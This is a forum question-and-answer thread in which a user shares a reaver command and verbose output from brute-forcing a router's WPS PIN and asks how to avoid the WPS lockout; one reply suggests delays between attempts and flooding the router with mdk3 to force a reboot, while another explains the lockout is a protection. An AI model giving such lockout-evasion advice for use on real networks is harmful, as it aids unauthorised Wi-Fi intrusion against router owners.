W
W
wol2for2016-12-05 02:14:41
linux
wol2for, 2016-12-05 02:14:41

How to setup Reaver from blocking?

I'm trying to brute PIN. After entering:
reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv -L -a.
The process starts:

[+] Switching wlan0mon to channel 13
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: Bwf)
[+] Starting Cracking Session. Pin count: 3, Max pin attempts: 11000
[+] Trying pin 11115670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c9:e3:0d:a4:dd:68:2b:fc:77:75:23:99:ed:21:2e:44
[P] PKE: fb:bb:13:73:12:af:bb:e7:24:f9:48:92:fc:c5:7f:b8:ef:03:89:8e:b2:12:05:47:64:14:f1:6c:1b:2e:f2:4a:77:7e:41:cf:8d:8e:98:17:95:53:81:83:54:54:27:a2:ab:e1:07:26:68:cb:84:43:f0:8c:44:c7:ff:08:87:b3:51:47:23:67:94:60:76:0f:f0:04:a3:18:76:e6:8d:c7:2a:95:a1:39:af:23:a5:5f:e6:94:9a:e2:59:b4:8f:11:ca:f9:cf:86:49:31:90:9d:89:59:9c:13:29:fd:51:ea:53:91:b2:cb:5d:e6:3e:37:26:78:c2:c3:20:2f:4b:fe:25:39:53:fd:43:73:3b:13:89:e0:85:ae:1a:f5:91:24:8c:ef:5b:84:ed:66:27:57:a5:ce:3f:bf:83:85:bf:a3:81:f2:a0:36:8a:3b:7f:62:84:56:7e:e5:68:b6:0f:c1:94:2b:2d:f8:c2:2a:22:e1:e6:53:09:3d:a6:2e:8a:65
[P] WPS Manufacturer: ASUSTeK Computer Inc.
[P] WPS Model Name: WPS Router
[P] WPS Model Number: RT-AC51U
[P] Access Point Serial Number: 00000000
[+] Received M1 message
[P] R-Nonce: a3:09:2e:b1:61:1d:e9:31:4f:6f:c4:eb:9e:80:9b:26
[P] PKR: 73:a6:9e:fc:ff:62:f4:0f:81:0d:58:3a:b8:3a:e4:f7:95:d2:c2:b5:4d:42:f3:6c:1b:ae:56:a1:56:ab:f5:cd:16:df:9d:6a:9b:11:ca:39:05:c1:d9:cd:f1:84:20:c8:76:1d:73:fb:07:b6:b1:ed:6b:b5:b5:bc:8e:3e:e8:4a:14:68:41:3d:91:56:77:ed:da:8f:74:61:d1:61:bb:57:f9:87:69:fb:47:d8:6f:af:2f:48:78:c5:7c:03:3d:36:62:a5:db:cd:4e:e7:a2:2d:fb:54:fd:a5:6b:e1:a4:1e:23:8d:2b:2c:18:c0:a1:0d:0b:02:c1:39:78:37:5c:c1:56:f6:d4:a3:f7:0d:dd:01:c1:eb:3a:82:41:52:68:80:f9:57:1d:5a:65:42:01:f2:7e:46:44:f3:e8:c5:d9:cf:aa:4b:4c:6b:e7:74:92:97:f8:98:d4:89:96:33:74:45:41:8f:8d:3d:d5:e9:34:16:71:c5:7c:3a:f5:5a:1f:d7
[P] AuthKey: c9:b2:54:f0:9c:09:80:5b:7d:19:0a:03:d9:10:1c:32:55:bc:d4:43:da:ea:e0:8d:f9:71:53:67:4a:b5:25:9c
[+] Sending M2 message
[P] E-Hash1: b6:a4:df:1c:2d:f2:5f:3f:85:7c:d0:d7:0a:45:42:66:68:ff:be:a3:aa:5b:c7:b5:4a:04:d0:41:6d:3b:56:9f
[P] E-Hash2: 4c:94:84:c4:d6:65:df:cf:bd:93:a9:84:76:c7:91:14:05:52:53:6e:1b:b8:26:e4:a1:aa:be:1c:82:21:7b:a0
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK

And so after 4 attempts, the following picture is obtained:
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: d0:5c:5f:cf:9f:39:75:1c:1b:a4:60:e1:4a:88:01:90
[P] PKE: ce:61:b9:c3:4c:f4:76:e7:af:8f:ce:3c:f8:7b:b1:db:a3:b3:42:9e:7a:27:ed:55:a2:7f:42:b6:69:ad:d5:fc:7f:83:f6:84:30:8c:cd:63:ba:4a:b7:ac:ae:22:12:54:47:b9:8c:50:8a:85:bc:1e:ac:2a:86:f7:a1:ce:1f:28:58:19:88:86:b5:9f:8a:46:1d:ee:48:8e:42:74:93:96:40:e6:46:06:15:0a:3d:51:8a:f5:cc:c2:bf:4b:6a:b4:c4:77:68:2e:ec:b7:0b:34:8f:cf:40:d2:ff:0f:12:de:0d:3f:29:1a:a5:3e:14:cc:c4:c7:c3:da:04:7d:01:19:81:ca:5a:12:ff:31:43:31:03:b3:4e:e6:94:4c:0b:5d:18:99:0c:fc:12:4a:f1:50:09:0f:86:84:11:a0:90:bd:32:fb:55:31:6f:a6:31:17:d2:78:a3:a3:4f:32:63:1c:a3:ab:95:a5:15:06:c3:af:31:b2:96:4e:de:c3:19:52
[P] WPS Manufacturer: ASUSTeK Computer Inc.
[P] WPS Model Name: WPS Router
[P] WPS Model Number: RT-AC51U
[P] Access Point Serial Number: 00000000
[+] Received M1 message
[P] R-Nonce: 67:8d:5b:34:2b:b0:64:4d:65:7e:cb:38:bb:a6:49:c3
[P] PKR: 80:e3:54:72:a1:5e:88:96:39:2e:43:da:9f:d0:5e:e2:08:c2:cc:bc:64:55:35:b8:6e:81:74:f8:de:f0:c9:c8:0f:99:49:d3:ac:ba:bb:74:06:c1:a8:fe:62:36:48:01:c3:d6:b8:0c:26:02:d6:44:1b:f1:f1:7d:cd:e9:01:12:f7:dc:13:3f:e2:52:b0:7f:d4:0b:60:79:67:3b:04:67:72:be:cb:fa:36:85:68:a7:dc:c7:64:10:ac:b1:1a:6b:6c:ec:1d:a7:f8:4c:21:bf:c1:cb:a6:bd:27:25:ce:05:a4:f7:41:a7:2e:b5:d3:e8:3a:db:f5:58:14:4a:3c:ff:0c:f3:4e:68:5f:c2:e0:fd:71:40:3c:aa:83:cd:85:99:b0:08:32:33:49:5e:1c:14:78:25:e2:4a:17:75:90:c6:6f:69:ae:5e:94:89:71:e1:27:be:c5:03:ee:8c:a5:39:f0:5c:78:cb:3c:fc:19:cc:37:16:9b:7c:f9:53:e9:ea
[P] AuthKey: 60:f2:72:8d:75:85:e5:34:7e:f2:55:73:c5:ee:7f:be:89:65:31:d1:6d:e7:a6:f3:ad:68:19:d2:8e:40:76:2d

After that, WPS will be locked:
BSSID                      Channel       RSSI       WPS Version       WPS Locked        ESSID
----------------------------------------------------------------------------------------------
XX:XX:XX:XX:XX:XX           13            00          1.0               Yes              Bwf

Question: how to set up reaver so that WPS does not block, that is, whatever it gives out
[!] WPS transaction failed (code: 0x04), re-trying last pin
.

Answer the question

In order to leave comments, you need to log in

2 answer(s)
I
Ilyas, 2016-12-05
@id2669099

usually you need to set a timeout between attempts, what timeout, it already depends on the router, here it’s only a selection method.
but in general, you can push it with connections using mdk3 to softboot, wait for it to load and then you can sort it out further (usually this can be automated with a script),
naturally this can be done solely for educational purposes and only on your own equipment

M
Max, 2016-12-05
@MaxDukov

WPS is locked on the side of the router - protection against enumeration of PINs is triggered.

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question